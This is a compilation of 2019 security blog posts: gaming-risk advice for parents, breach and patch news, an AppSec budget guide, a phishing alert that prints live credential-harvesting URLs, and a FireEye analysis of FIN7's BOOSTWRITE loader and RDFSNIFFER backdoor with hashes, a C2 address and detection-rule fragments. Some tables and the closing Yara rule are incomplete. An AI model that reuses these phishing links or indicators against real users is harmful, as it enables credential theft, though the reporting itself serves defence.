Two types of harassment specific to online experiences go a step beyond what you would expect from online bullying: doxxing and swatting. Doxxing is when one or more online participants seek personal, identifying information on a particular user for blackmail or intimidation purposes. Doxxing can often lead to the release of real names, phone numbers, home addresses, employer information, and more. Swatting is a form of harassment that uses doxxing techniques to create an actual, tangible threat. A harasser will call in a threat to a doxxed user’s local law enforcement, often claiming there is a kidnapping or hostage situation at the victim’s address. This may bring a large SWAT response unit to descend upon the address.

Keeping an open line of communication about your kid’s gaming experiences is critical. Swatting can happen over seemingly innocuous events. One of the most notorious examples followed a dispute over a $1.50 bet in “Call of Duty: WWII.”

Pro tip: one is only vulnerable to doxxing and swatting if a harasser can link identifying information back to the targeted gamer. Educating your kids on digital privacy best practices is one of the strongest security measures you can take against these forms of online harassment.

Viruses and Malware

As with almost every digital experience, you’ll find specific cybersecurity threats associated with the online gaming landscape. We asked Tyler Moffitt, Webroot security analyst, for his thoughts on the malware threats associated with online gaming. 

“The thing kids should really watch out for with games is the temptation to cheat,” explains Moffit. “In popular games like Fortnite and PUBG, ‘aimbots’ are very common, as they allow the player to get headshots they normally wouldn’t be able to make. However, many of the aimbots that kids download from forums are packed with malware—usually  ransomware or info-stealing Trojans. What’s worse: a lot of young gamers also don’t run antivirus because they think it will make the game slower.”

The bottom line: cheating at online games isn’t just ethically icky, it makes you a proven target for hackers. Make sure your kids know the real cost of “free” cheats.

Phishing Scams and Account Takeovers

Where there’s money, there are scammers. With more than 1 billion gamers actively spending money not just on games, but in games, it’s no surprise that phishing scams have become commonplace in gaming communities. One of the most prevalent phishing tactics in gaming: account takeovers are often prompted by a risky link click on a gaming forum, or a compromised account sending out phishing links to other users. Once the hacker has control of the account, they can run up fraudulent charges to any attached credit cards or, in some cases, sell the compromised account (particularly if it contains valuable items or character skins). Young gamers are especially at risk for these hacks. In these cases, chances are that any credit cards attached to gaming accounts belong to you, not your kids, so young gamers aren’t going to notice who’s spending your hard-earned funds.

Keeping Your Kids Safe

You’ll find plenty of tools to help your kids stay secure while gaming. Reliable antivirus software installed and up-to-date on all of your household smart devices can protect your family from malicious software. Additionally, wrapping your household web traffic in the secure encryption of a trusted VPN could reduce doxxing potential. But your kids will only find true security through digital literacy. Start conversations with them not just about online bullying, but about recognizing cybersecurity threats and phishing scams. If you’re having a hard time connecting with them over the threat, remind them that it’s not just your wallet on the line. Account takeovers are now all too common, and no kid wants to see their Fortnite skins sold for a stranger’s profit. Also, always be sure to exercise caution in giving out information on the internet. Even small, seemingly irrelevant pieces of information could be used to pull up Facebook or other user account pages to grab even more personal data.

To keep your kids educated about online gaming risks, it’s important to educate yourself as well. Have a question we didn’t cover here? Ask the Webroot community.

The post Online Gaming Risks and Kids: What to Know and How to Protect Them appeared first on Webroot Blog.

Apple iTunes and iCloud for Windows 0-Day Exploited in Ransomware Attacks

Watch out Windows users! The cybercriminal group behind BitPaymer and iEncrypt ransomware attacks has been found exploiting a zero-day vulnerability affecting a little-known component that comes bundled with Apple's iTunes and iCloud software for Windows to evade antivirus detection. The vulnerable component in question is the Bonjour updater, a zero-configuration implementation of network

Data of 250K Users of Sex Industry Website on Sale for $300

Data of 250K Users of Sex Industry Website on Sale for $300

A hacker has exploited a vulnerability on Dutch website Hookers.nl to appropriate the account details of all 250,000 users, which he is now offering for sale on the dark web.

The exposed data includes the email addresses, usernames, IP addresses, and passwords of sex workers and their clients. In a sample of the data viewed by Dutch news broadcaster NOS, the passwords were encrypted, but the email addresses—many of which included the actual names of the users—were fully legible.    

The hacker, an unknown man, expressed no guilt or regret over his actions, telling NOS: "Tens of thousands of websites are hacked every day. I'm not the devil. It's not a question of whether your website is hacked, but when."

According to NOS, while the hacker hasn't completed any sales of the data yet, it is available for purchase by any interested parties for a mere $300.

A moderator for Hookers.nl wrote: "Offering this information for sale is punishable by law, and if possible, we will take legal action. In addition, a report has been made to the Dutch data protection authority."

Hookers.nl is a popular website among sex workers and their clients, who use it to write reviews, exchange tips, and share their experiences of the sex industry. The website confirmed to NOS this morning that the breach had occurred and issued the assurance that all users would be notified.

The breach occurred as a result of a technical weakness in the vBulletin forum software, which was revealed a few weeks ago. The opportunistic hacker told NOS that he exploited the hole before the company behind the website, Midhold, plugged it with a patch on September 25. 

"It is of course not an account of your internet provider that leaked, maybe you don't want people to know that you have an account here. We are not happy with this," said Tom Lobermann, spokesperson for Midhold, which also operates Kinky.nl, Erotracks.nl, and Webcambordeel.nl.

A breach of this kind carries with it the threat of blackmail. Arda Gerkens of the Help Wanted foundation, who assists victims of sex-related abuse, said: "Membership in such a forum is certainly something someone can be extorted with. Some people are not secretive about their prostitution visit, but it is certain that when people use a nickname, they want to remain anonymous."

Hookers.nl has set up a forum page for users who want their accounts to be removed.

Watch Your Step: Insights on the TOMS Shoes Mailing Hack

You’re familiar with the cybercriminals that go after users’ credit card information and look to spread malicious links, but recently, one hacker decided to send a different message. According to Vice’s Motherboard, a hacker accessed TOMS Shoes’ mailing list and sent an email encouraging users to log off and go enjoy the outdoors.

The email specifically stated, “hey you, don’t look at a digital screen all day, theres a world out there that you’re missing out on.” The hacker claimed to have compromised TOMS a while back but never had any malicious intent and felt it had been too long to disclose the breach to the authorities. Although the hacker didn’t tell Motherboard how he or she specifically gained access to the TOMS account, they did voice their frustrations with hackers who steal data from large companies and innocent civilians.

Representatives from TOMS stated that they are actively looking into the breach and warned users to not interact with the message. And while this particular hacker had no malicious intent, users could have a potential phishing scam on their hands if these email addresses had ended up in the wrong hands.

So, whether you’re a TOMS shoe wearer or not, it’s important to stay updated on potential cyberthreats so you can recognize immediately. Here are some tips to help you avoid accidentally treading on potential phishing emails:

  • Go directly to the source. Be skeptical of emails claiming to be from companies with peculiar asks or messages. Instead of clicking on a link within the email, it’s best to go straight to the company’s website to check the status of your account or contact customer service.
  • Be cautious of emails asking you to take action. If you receive an email asking you to take a certain action or download software, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links.
  • Hover over links to see and verify the URL. If someone sends you an email with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Watch Your Step: Insights on the TOMS Shoes Mailing Hack appeared first on McAfee Blogs.

Verified Mark Certificate Issued to CNN

Verified Mark Certificate Issued to CNN

CNN has been issued a new digital certificate that uses logo verification to prove emails sent from a particular domain are genuine.

The certification of the American news channel with a Verified Mark Certificate by DigiCert, Inc. marks the first time a VMC has been issued for a domain that sends emails at scale. 

The news follows the announcement on September 4, 2019, that Entrust Datacard had become the first certification authority (CA) to issue a VMC. 

VMCs work by verifying the existence of a secure connection between a company domain and a particular sender-designated brand logo included within an email. 

The certificates are signed cryptographically with a trusted root, allowing mail applications to rely on the information the certificate contains. The organization is issued a VMC by a CA once the signature process has been completed.

Receiving their certificate has readied CNN for participation in upcoming pilots of the BIMI (Brand Indicators for Message Identification) standard, which is being developed by AuthIndicators Working Group. BIMI will allow domain owners to specify a logo that will appear in the inbox, alongside authenticated email messages sent from their domains. 

To work, BIMI requires both the email and the logo to be properly validated. The email must be authenticated through the Domain-based Message Authentication, Receiving & Conformance (DMARC) standard, with a policy of quarantine or reject; the logo itself will be validated by the VMC.

While Yahoo Mail is currently running a pilot of BIMI, Google is planning a BIMI pilot of its own in 2020.

VMCs are not currently in use in BIMI pilots, but they are expected to become a requirement because they are a scalable way to ensure that corporate logos are not used fraudulently. 

With widespread use of VMC, BIMI, and DMARC, companies will be able to amplify and protect their online presence through authenticated messages to consumers that are instantly recognizable by their known, protected brand marks.

"DigiCert is excited to work with CNN and members of the AuthIndicators Working Group to take this first step in demonstrating the feasibility and benefit of VMCs for global brands under the BIMI pilot program," said DigiCert chief of product Jeremy Rowley.

Securing the Unsecured: State of Cybersecurity 2019 – Part II

Recently the Straight Talk Insights team at HCL Technologies invited a social panel to discuss a critical question at the center of today’s digital transitions: How do companies target investments and change the culture to avoid being the next victim of a cyberattack?

In Part I of the series, we explored IT security trends for 2019 and ways companies can protect themselves from IoT device vulnerability. Today, we’re continuing the discussion by exploring the threat of cryptocrime, the nature of cybersecurity threats in the near future, and the steps that small- and medium-sized businesses can take to protect themselves.

Q3: How great is the threat to companies of “crypto crime”?

The thing about ransomware is that it’s no longer the province of specific groups. At the RSA Conference this year, McAfee’s own Raj Samani shared the advent of the franchise model in crypto crime. As a result, we are seeing greater reach, but less unique systems applying ransomware. Still, we see the enterprises failing in the same ways year after year and falling victim to these families of ransomware at scale.

As you seek to conquer incident response as an effective plank of mitigating the effect of phishing and initial ransomware infections—I’d ask, how does your incident response change in the cloud? Do you have incident response resources and provisions for SaaS vs. IaaS? How do you get the logs and resources that you need from cloud providers to effectively investigate and ensure you have identified all affected nodes, or the initial attack vector? The time to figure out that question isn’t during time-compressed investigation stages when everyone is under stress from an active threat.

With the recent third anniversary of No More Ransom, security leaders like Raj Samani and the companies that make up partnerships like that of the No More Ransom website can help offer basic protection for some forms of ransomware. In this joint project with Europol and AWS, it’s been an amazing journey to watch and even invest in helping protect businesses against ransomware.

Q4: How can small businesses with limited resources protect the privacy of their customers?

The dwell time of threats in small and medium businesses is 45 to 800 days, with the averages moving more towards the latter. Cloud based information security SaaS (Software as a Service) is helping to level the playing field. To make continued progress, venture capital backing small firms, and the public buying from these companies, need to assert an expectation of security as part of doing business.

Many restaurants and retail establishments are still small businesses today, run by families and individuals. In many of these stores, there is a certain level of distrust of cloud and connected platforms, versus point-of-sales systems they can put their hands on and feel like they have control over. How do we gain the trust and their attention to of these small stakeholders, help them either more strongly secure things in-house or make the move to cloud security services? We can’t just have an answer that demands $4,000 or $40,000 to make the fix. Instead we have to find every possible opportunity to go serverless and make more and more walled garden capability for things like point of sale, or small engineering platform.

When it comes to small businesses interconnecting systems and moving into cloud services for consumers, these small companies holding identities is a challenge from a trust perspective. Forums and programs like the OpenID technologies providing standards and enabling identity without spreading the authorization infrastructure unnecessarily has been instrumental in constraining the size of this problem.

Security spans everything. There are basic exercises that you can do as business customers to check your readiness. I am a huge fan of SOAPA from ESG as a method of mapping what assets you have at different levels of the organization. Ask yourself a basic question -can you keep control integrity when you go from one “tower” —like on-premise—of connected capability to mapping the other silos or major cloud environments of your hybrid company? I’d also add it costs nothing to follow some of your favorite security personalities. I follow people like Cisco’s Wendy Nather and Kate Moussouris, the CEO of Luta Security who is helping even small companies understand the market of bug bounties and vulnerability disclosure.

Here, too, public policy potentially has a natural role. Government requires health training, for example in a restaurant, but not information security necessarily at small- and medium-sized business. Actually, the natural consequences and motivations of insurance companies can be an ally here, requiring training in basic computer hygiene, security, and privacy as part of issuing liability policies for businesses.

Q5: What are some new cybersecurity threats that we can expect to see in the next year?

I expect to see the rise of more significant exploitation of the “seams” in cloud integrations. The recent CapitalOne breach was relatively benign in the scheme of things. The actor was a braggart hacktivist, but the media coverage emphasized the weakness of cloud integrations to many who might have more capability. We’ve seen spikes in discussion in the dark web around this, so the profile of the cloud vulnerability is higher, and now we will have to see how the cat-and-mouse game between offense and defense proceeds.

I think it’s worth adding, the next threat isn’t as much the challenge to me, as the enterprise reaching the next run of maturity in the digital environment. Asset management, vulnerability reduction, and preparing the protection of cloud operations and visibility are all critical disciplines for the enterprise, no matter what the threat is.

Protect your devices. Protect your cloud—not in silos, but with an integrated strategy. Demand from your vendors the ability to integrate to maintain a cohesive threat picture which you can use to easily react.

To read Part I of this two-part series, click here.


The post Securing the Unsecured: State of Cybersecurity 2019 – Part II appeared first on McAfee Blogs.

Critical Security Vulnerability Disclosed in iTerm2 App

A critical vulnerability has been discovered in the popular iTerm2 application, an open source terminal emulator program designed to replace the default Apple Terminal in macOS. iTerm2 often finds its way into lists of some of the best software to install on a Mac. It is especially popular with power users as a result of […]… Read More

The post Critical Security Vulnerability Disclosed in iTerm2 App appeared first on The State of Security.

SECURITY ALERT: New Credential Stealing Campaign Hits Nordic Countries

People in Nordic countries and beyond should beware: there’s a new credential stealing campaign up and running. For now, it seems to be hitting mostly these countries, but there’s no telling when it will extend to the rest of the world. Where there’s (illicit) money to be made, hackers are restless.

How the New Nordics Credential Stealing Campaign Works

As far as we’ve seen so far, the new Nordics credential-stealing campaign is targeting working emails. The malicious message pretends to be part of a previously agreed upon conversation, since the document is introduced as a link, without much explanation.

This is how a typical email looks like:

Fra: [sender email address] Sendt: 2. oktober 2019 09:56
Emne: Doc
Prioritet: Høj


Finn vedlagte dokument

Vis Dokument (https://amagauto-my.sharepoint.com/personal/senad_ljubuncic_amag_ch/_layouts/15/WopiFrame.aspx?sourcedoc={7ea83df5-6fc6-4c9c-9b65-fb8806b565be}&action=view&wd=target%28Document.one%7C97f58f57-7285-4f70-8af0-fb5d7d3e3b82%2FPDF%20002%7C4c8df191-241d-4d43-91b6-b3658f3bcdca%2F%29)

Med vennlig hilsen


Phone, Email, Company name etc.]

Translated into English, this email would be this:

From: [sender email address]
Posted: October 2, 2019 9:56 AM
Subject: Doc
Priority: High


Find the attached document

View Document (https://amagauto-my.sharepoint.com/personal/senad_ljubuncic_amag_ch/_layouts/15/WopiFrame.aspx?sourcedoc={7ea83df5-6fc6-4c9c-9b65-fb8806b565be}&action=view&wd=tar 7C97f58f57-7285-4f70-8af0-fb5d7d3e3b82% 2FPDF% 20002% 7C4c8df191-241d-4d43-91b6-b3658f3bcdca% 2F% 29)

With best regards


Phone, Email, Company name etc.]

What happened next, if the user clicked that link?

They are redirected to a picture of a document (it’s not even a real document). The picture has a hyperlink inserted on it, which means that when a user clicks it, they will be redirected to a malicious page.

screenshot of fake document

The fraudulent page then asked users to login with whatever account they had, either Yahoo, Office 365, Gmail, etc.

You can watch a slideshow of what happened here (just move your mouse left-right to scroll through the screenshots).

A day later, the Nordics credential stealing campaign grew a new form. This time, the malicious document link was this one, instead: https://farmtools-my.sharepoint.com/personal/johanna_ratia_farmtools_fi/_layouts/15/WopiFrame.aspx?sourcedoc={b70a453e-0c44-45f5-8a31-01d022e88a43}&action=view&wd=target%28Document%20Library.one%7C53cc22f2-1e03-4b9b-8bc5-9b8bc9980cb7%2FScan0000495%7C5773954c-e41f-4956-859b-56edd77199ed%2F%29

In both cases, the malicious portal behind the fake links was https://lazzysisland.com.

How to Stay Safe from the New Nordics Credential Stealing Campaign

If you have an active Thor Foresight or Thor Premium subscription you are automatically protected from the malicious links above.

But if you’re not – and even if you are – make sure you’re ready for the next round. This campaign or another one like it will be back.

The best way to deal with them is to stay on your guard:

  • Don’t open documents and don’t click any links in emails from people you don’t know;
  • Be proactive about your cybersecurity and have a DNS traffic filter (like Thor Foresight – either for Home or Enterprise);
  • Stay informed about credential stuffing (why criminals might want to steal your credentials) and about phishing in general;
  • If you are part of managing an organization (which means you and your employees will be huge targets for all sorts of phishing attempts), learn about business email compromise (BEC) and about MailSentry™, a cybersecurity solution specially designed to block BEC attacks of any kind.

Stay safe!

The post SECURITY ALERT: New Credential Stealing Campaign Hits Nordic Countries appeared first on Heimdal Security Blog.

Making the Case for AppSec? Break Down Your Budget

The bottom line on corporate decision-making comes down to the bottom line. It’s critical to demonstrate value for any new or expanded initiative. Fall short, and your odds of success are greatly diminished.

How do you build the financial case for more robust AppSec, when the focus is on the impact to the bottom line? The key is understanding how to effectively design and present a budget that makes sense to your stakeholders. A crucial element is to recognize that stakeholders need options and choices. By breaking down your budget into categories such as “must do,” “should do,” and “could do,” you’ll greatly increase the odds of securing the budget you need. It’s a lot harder to say no to several different options than to one plan and one number.

Breaking It Down

You most likely have a range of priorities within your AppSec initiative that you’d like funding for – the must do, should do, and could do activities you and your team want to execute. If you break down your “ask” into these three categories, you give your stakeholders options regarding what they can approve. For example, you might offer the following budget options:

Must: We must comply with industry regulations regarding AppSec. Whether it’s PCI, HIPAA, or NY DFS cybersecurity regulations, non-compliance is not an option, and getting budget to address regulations shouldn’t take much convincing.

Should: We should assess code with static analysis, eliminate all “high” or “very high” severity flaws, and train developers on secure coding. Getting at the most-likely-to-be-exploited vulnerabilities and cutting down on the new vulnerabilities being introduced into your code is a good place to start.

Could: We could employ multiple testing techniques beyond static analysis and eliminate the “medium” severity flaws as well. Ultimately, static analysis is a good starting point, but truly effective AppSec requires several testing types that find different vulnerabilities in different ways, including dynamic analysis, software composition analysis, and manual penetration testing.

The right frameworks can help guide you through this budget breakdown. For instance, the Veracode Verified program provides best-practice AppSec roadmap you can use to show a clear path forward. It can also help you break down the must/could/should items. The ability to show progress and defend your budget is essential to getting the backing your need from key executives. You also don’t want to stall at the “must” budget, but show a path toward the most effective and efficient AppSec program.

Additional Budget Selling Points

After breaking down your budget to give stakeholders options, you can create urgency around the spend by finding an event or series of events that demonstrate the seriousness of the issue. This includes data about code vulnerabilities, incidents, and breaches, and what direct and indirect costs grow out of these events. For example, British Airways was recently fined £185 million for its data breach.  

In addition, highlight efficiencies gained by your program. For example, demonstrate how an integrated and automated program will free staff from cumbersome and time-consuming processes, or how teams will be able to better focus on innovation.

Finally, a good foundation for any business case is industry stats or benchmarks. Consider adding these data points into your pitch. You can find some in our State of Software Security report or consider the OpenSAMM model.

On the Money

Ultimately, any presentation should deliver only the most relevant points in a digestible format. Busy executives want to know whether a project will have a positive impact and what that positive impact will be. In order to become an effective change agent, keep your proposal and budget request limited to a half a dozen key points, and be sure to focus on the issues that matter to specific executives.

Remember, a robust AppSec program is a multi-year endeavor, and keeping the funding stream flowing is critical. In order to do this, budget requests must be tied to metrics, KPIs, and other measures. You must demonstrate ongoing success and show results in real-world ways that truly matter to business leaders and your enterprise. With buy-in from key stakeholders, your odds of obtaining essential funding and support are high. And that, in the end, is a formula for a more secure enterprise.

For more details on making the case for AppSec budget, see our new guide, Building a Business Case for Expanding Your AppSec Program.

SAP October 2019 Security Patch Day fixes 2 critical flaws

SAP addressed two critical vulnerabilities (Hot News) as part of the October 2019 Security Patch Day.

SAP has released its October 2019 Security Patch Day updates that also address two critical vulnerabilities (Hot News) with CVSS scores of 9.3 and 9.1.

The October 2019 Security Patch Day also includes a High Priority Note addressing Binary Planting vulnerability.

“With only nine new and one updated Security Note, SAP has published an unusually low number of Security Notes for October 2019.” reads the analysis published by security firm Onapsis. “This is the lowest number of newly published notes in the past five years. Nevertheless, with 2 HotNews Notes and one High Priority Note, this Patch Day deserves special attention as an attacker needs only one vulnerability for a successful attack.”

The most severe SAP Security Note is #2826015, a Missing Authentication Check in AS2 Adapter of B2B Add-On for SAP NetWeaver Process Integration. The vulnerability, tracked as CVE-2019-0379, could be exploited by remote attackers to steal or manipulate sensitive data, it could also provide attackers with access to administrative and other privileged functionality.

“The adapter specifies a comprehensive set of data security features, specifically data confidentiality and data authenticity, which are aimed at the B2B commerce environment. The configuration of the AS2 adapter allows two different security providers.” reads the analysis published by Onapsis. “Depending on the selected provider, a Missing Authentication vulnerability exists that can lead to sensitive data theft or data manipulation as well as to access to administrative and other privileged functionalities.”

The vulnerability received a CVSS score of 9.3.

The second Hot News (SAP Security Note #2828682) addresses a flaw tracked as CVE-2019-0380, it is an information disclosure flaw in SAP Landscape Management enterprise edition. the flaw affects version 3.0 and received a CVSS score of 9.1.

“SAP Security Note #2828682 talks about a risk of information disclosure if these custom parameters fulfill specific conditions. SAP describes the overall conditions for the existence of the vulnerability as “uncommon”.  “

The vulnerability is related to the custom parameters that can be added by users to providers assigned to custom operations.

SAP October 2019 Security Patch Day

SAP also addressed a Binary Planting vulnerability in several SAP software products, including Anywhere, SAP IQ and SAP Dynamic Tiering. The flaw tracked as CVE-2019-0381 resides in the file search algorithm of the affected products, it received a CVSS score of 7.8.

“The algorithm searches too many directories, even if they are out of the application scope.” Onapsis explains. “Possible impacts are path traversals and directory climbing, enabling an attacker to read, overwrite, delete, and expose arbitrary files of the system. This can also lead to DLL hijacking as well as to privilege elevation.”

SAP also addressed multiple Cross-Site Scripting (XSS) vulnerabilities in its products, rated as medium, including one in Customer Relationship Management (CVE-2019-0368), and multiple issues in the SAP BusinessObjects Business Intelligence Platform (CVE-2019-0374, CVE-2019-0375, CVE-2019-0376, CVE-2019-0377, and CVE-2019-0378),

The full list of the addressed issues in SAP Security Patch Day – October 2019 is available here.

Pierluigi Paganini

(SecurityAffairs – SAP, hacking)

The post SAP October 2019 Security Patch Day fixes 2 critical flaws appeared first on Security Affairs.

Microsoft NTLM vulnerabilities could lead to full domain compromise

Preempt researchers have discovered two vulnerabilities that may allow attackers to bypass a number of protections and mitigations against NTLM relay attacks and, in some cases, to achieve full domain compromise of a network. What is NTLM? NT LAN Manager (NTLM) is an authentication protocol developed by Microsoft, used to authenticate a client to resources on an Active Directory domain. “Interactive NTLM authentication over a network typically involves two systems: a client system, where the … More

The post Microsoft NTLM vulnerabilities could lead to full domain compromise appeared first on Help Net Security.

Mahalo FIN7: Responding to the Criminal Operators’ New Tools and Techniques

During several recent incident response engagements, FireEye Mandiant investigators uncovered new tools in FIN7’s malware arsenal and kept pace as the global criminal operators attempted new evasion techniques. In this blog, we reveal two of FIN7’s new tools that we have called BOOSTWRITE and RDFSNIFFER.

The first of FIN7's new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators.

RDFSNIFFER, a payload of BOOSTWRITE, appears to have been developed to tamper with NCR Corporation's “Aloha Command Center” client. NCR Aloha Command Center is a remote administration toolset designed to manage and troubleshoot systems within payment card processing sectors running the Command Center Agent. The malware loads into the same process as the Command Center process by abusing the DLL load order of the legitimate Aloha utility. Mandiant provided this information to NCR.

BOOSTWRITE Loader: Where You At?

BOOSTWRITE is a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.

Once loaded, `DWrite.dll` connects to a hard-coded IP and port from which it retrieves a decryption key and initialization vector (IV) to decrypt two embedded payload DLLs. To accomplish this task, the malware first generates a random file name to be used as a text log under the current user's %TEMP% directory; this filename starts with ~rdf and is followed by a set of random numbers. Next, the malware scans its own image to find the location of a 32-byte long multi-XOR key which is used to decode data inside its body. Part of the decoded data is an IP address and port which are used to retrieve the key and the IV for the decryption of the embedded payloads. The encryption algorithm uses the ChaCha stream cipher with a 256-bit key and 64-bit IV.

Once the key and the IV are downloaded the malware decrypts the embedded payloads and performs sanity checks on the results. The payloads are expected to be PE32.DLLs which, if the tests pass, are loaded into memory without touching the filesystem.

The malware logs various plaintext messages to the previously created logfile %TEMP%\~rds<rnd_numbers> which are indicative of the loader’s execution progress. An example of the file content is shown in Figure 1:

Init OK
Key OK
Data: 4606941
HS: 20
K:[32] V:[8]
DCnt: 732642317(ERR)

Figure 1: BOOSTWRITE log file

Before exiting, the malware resolves the location of the benign DWrite.dll library and passes the execution control to its DWriteCreateFactory method.

The malware decrypts and loads two payload DLLs. One of the DLLs is an instance of the CARBANAK backdoor; the other DLL is a tool tracked by FireEye as RDFSNIFFER which allows an attacker to hijack instances of the NCR Aloha Command Center Client application and interact with victim systems via existing legitimate 2FA sessions.

RDFSNIFFER Module: We Smell a RAT

RDFSNIFFER is a module loaded by BOOSTWRITE which allows an attacker to monitor and tamper with legitimate connections made via NCR Corporation’s ‘Aloha Command Center Client’ (RDFClient), an application designed to provide visibility and system management capabilities to remote IT techs. RDFSNIFFER loads into the same process as the legitimate RDFClient by abusing the utility’s DLL load order, launching each time the ‘Aloha Command Center Client’ is executed on an impacted system.

When the RDFSNIFFER module is loaded by BOOSTWRITE it hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface (Table 1). Furthermore, this enables the malware to alter the user’s last input time to ensure application sessions do not time out.

Win32 API Function

Hook Description


Used to man-in-the-middle SSL sessions


Used to man-in-the-middle SSL sessions


Used to man-in-the-middle socket connections


Used to man-in-the-middle socket connections


Used to man-in-the-middle socket connections


Used to hijack the utility's UI


Used to hijack the utility's UI


Used to hijack the utility's UI


Used to hijack the utility's UI


Used to change the user's last input time (to avoid timed lock outs)

Table 1: RDFSNIFFER’s Hooked Win32 API Functions

This module also contains a backdoor component that enables it to inject commands into an active RDFClient session. This backdoor allows an attacker to upload, download, execute and/or delete arbitrary files (Table 2).

Command Name

Legit Function in RDFClient

RDFClient Command ID





Uploads a file to the remote system




Retrieves a file from the remote system




Executes a command on the remote system




Deletes file on remote system




Deletes a local file

Table 2: RDFSNIFFER’s Backdoor Functions

Signed: Yours Truly, FIN7

While the majority of BOOSTWRITE variants recovered from investigations have been unsigned, Mandiant identified a signed BOOSTWRITE sample used by FIN7 during a recent investigation. Following that discovery, a signed BOOSTWRITE sample was uploaded to VirusTotal on October 3. This executable uses a code signing certificate issued by MANGO ENTERPRISE LIMITED (Table 3).








32 7F 8F 10 74 78 42 4A BE B8 2A 85 DC 36 57 03 CC 82 70 5B

Table 3: Code signing certificate used for BOOSTWRITE

This indicates the operators may be actively altering this malware to avoid traditional detection mechanisms. Notably, the signed BOOSTWRITE sample had a 0/68 detection ratio when it was uploaded to VirusTotal, demonstrating the effectiveness of this tactic (Figure 2).

Figure 2: Current VirusTotal detection ratio for signed BOOSTWRITE

Use of a code signing certificate for BOOSTWRITE is not a completely new technique for FIN7 as the group has used digital certificates in the past to sign their phishing documents, backdoors, and later stage tools. By exploiting the trust inherently provided by code certificates, FIN7 increases their chances of bypassing various security controls and successfully compromising victims. The full evasion achieved against the detection engines deployed to VirusTotal – as compared to an unsigned BOOSTWRITE sample with an invalid checksum– illustrates that FIN7’s methods were effective in subverting both traditional detection and ML binary classification engines. This is a known issue and has been deeply studied since at least 2016’s “Chains of Distrust” research and 2017’s “Certified Malware” paper. Since there are plenty of goodware samples with bad or no signatures – and a growing number of malware samples with good signatures – there is no easy solution here. The upside is that vendors selectively deploy engines to VirusTotal (including FireEye) and VT detection performance often isn’t a comprehensive representation of encountering full security technology stacks that implement detection-in-depth. Later in this blog we further explore BOOSTWRITE’s PE Authenticode signature, its anomalies, and how code signing can be turned from a detection challenge into detection opportunities.

Outlook and Implications

While these incidents have also included FIN7’s typical and long-used toolsets, such as CARBANAK and BABYMETAL, the introduction of new tools and techniques provides further evidence FIN7 is continuing to evolve in response to security enhancements. Further, the use of code signing in at least one case highlights the group's judicious use of resources, potentially limiting their use of these certificates to cases where they have been attempting to bypass particular security controls. Barring any further law enforcement actions, we expect at least a portion of the actors who comprise the FIN7 criminal organization to continue conducting campaigns. As a result, organizations need to remain vigilant and continue to monitor for changes in methods employed by the FIN7 actors.

Sigs Up Dudes! Indicators, Toolmarks, and Detection Opportunities

While FireEye does not release our production detection logic for the code families, this section does contain some identification and hunting concepts that we adopt in our layered detection strategy. Table 4 contains malware samples referenced in this blog that FireEye is able to share from the larger set recovered during active investigations.




MD5: a67d6e87283c34459b4660f19747a306
SHA-1: a873f3417d54220e978d0ca9ceb63cf13ec71f84
SHA-256: 18cc54e2fbdad5a317b6aeb2e7db3973cc5ffb01bbf810869d79e9cb3bf02bd5

C2: 109.230.199[.]227

BOOSTWRITE (unsigned)

MD5: af2f4142463f42548b8650a3adf5ceb2
SHA1: 09f3c9ae382fbd29fb47ecdfeb3bb149d7e961a1
SHA256: 8773aeb53d9034dc8de339651e61d8d6ae0a895c4c89b670d501db8dc60cd2d0

C2: 109.230.199[.]227

Table 4: Publicly-shareable BOOSTWRITE samples

The signed BOOSTWRITE sample has a PE Authenticode anomaly that can be detected using yara’s PE signature module. Specifically, the PE linker timestamp is prior to the Authenticode validity period, as seen in Table 5.



2019-05-20 09:50:55 UTC

Signed BOOSTWRITE’s PE compilation time

2019-05-22 00:00 UTC
2020-05-21 23:59 UTC

Signed BOOSTWRITE’s “mango ENTERPRISE LIMITED” certificate validity window

Table 5: Relevant executabe timestamps

A public example of a Yara rule covering this particular PE Authenticode timestamp anomaly is available in a blog post from David Cannings, with the key logic shown in Figure 3.

pe.number_of_signatures > 0 and not for all i in (0..pe.number_of_signatures - 1):

Figure 3: Excerpt of NCC Group’s research Yara rule

There are other PE Authenticode anomalies that can also be represented as Yara rules to surface similarly suspicious files. Of note, this signed BOOSTWRITE sample has no counter signature and, while the unauthenticated attributes timestamp structure is present, it is empty. In preparing this blog, FireEye’s Advanced Practices team identified a possible issue with VirusTotal’s parsing of signed executable timestamps as seen in Figure 4.

Figure 4: Inconsistency in VirusTotal file signature timestamps for the signed BOOSTWRITE sample

FireEye filed a bug report with Google to address the discrepancy in VirusTotal in order to remove confusion for other users.

To account for the detection weaknesses introduced by techniques like code signing, our Advanced Practices team combines the malicious confidence spectrum that comes from ML detection systems with file oddities and anomalies (weak signals) to surface highly interesting and evasive malware. This technique was recently described in our own Dr. Steven Miller’s Definitive Dossier of Devilish Debug Details. In fact, the exact same program database (PDB) path-based approach from his blog can be applied to the toolmarks seen in this sample for a quick hunting rule. Figure 5 provides the PDB path of the BOOSTWRITE samples from this blog.


Figure 5: BOOSTWRITE PDB path

The Yara rule template can be applied to result in the quick rule in Figure 6.

rule ConventionEngine_BOOSTWRITE
     author = "Nick Carr (@itsreallynick)"
     reference = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
